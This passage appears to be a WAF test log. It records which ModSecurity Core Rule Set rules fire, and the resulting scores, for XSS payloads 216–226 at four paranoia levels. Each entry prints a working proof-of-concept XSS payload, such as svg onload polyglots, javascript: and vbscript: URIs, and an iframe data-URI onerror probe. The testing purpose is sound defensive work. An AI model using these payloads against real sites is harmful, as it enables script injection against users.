941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-216 ********
Payload:
payload=<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-217 ********
Payload:
payload=javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 35
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-218 ********
Payload:
payload=javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"
--- Paranoia Level 1 ---
921130 PL1 HTTP Response Splitting Attack
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
Total Incoming Score: 30
--- Paranoia Level 2 ---
921130 PL1 HTTP Response Splitting Attack
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 61
--- Paranoia Level 3 ---
921130 PL1 HTTP Response Splitting Attack
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 82
--- Paranoia Level 4 ---
921130 PL1 HTTP Response Splitting Attack
941210 PL1 IE XSS Filters - Attack Detected.
941180 PL1 Node-Validator Blacklist Keywords
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 95
****** payload-219 ********
Payload:
payload=onmouseover=/*&amp;lt;svg/*/onload=alert()//></a>
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
942440 PL2 SQL Comment Sequence Detected.
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 15
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
942440 PL2 SQL Comment Sequence Detected.
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
Total Incoming Score: 28
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
942440 PL2 SQL Comment Sequence Detected.
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-220 ********
Payload:
payload=<img src="javascript:alert(1)"></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 40
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-221 ********
Payload:
payload=<body background="javascript:alert(1)"></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 35
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-222 ********
Payload:
payload=<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>"></a>
--- Paranoia Level 1 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941130 PL1 XSS Filter - Category 3: Attribute Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941130 PL1 XSS Filter - Category 3: Attribute Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941130 PL1 XSS Filter - Category 3: Attribute Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941130 PL1 XSS Filter - Category 3: Attribute Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
****** payload-223 ********
Payload:
payload=<a href="vbscript:MsgBox+1">XSS</a>
--- Paranoia Level 1 ---
941220 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941220 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941220 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941220 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-224 ********
Payload:
payload=<a href="#" onclick="vbs:Msgbox+1">XSS</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 48
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 64
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-225 ********
Payload:
payload=<a href="#" onclick="VBS:Msgbox+1">XSS</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 48
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 64
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-226 ********
Payload:
payload=<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
--- Paranoia Level 1 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
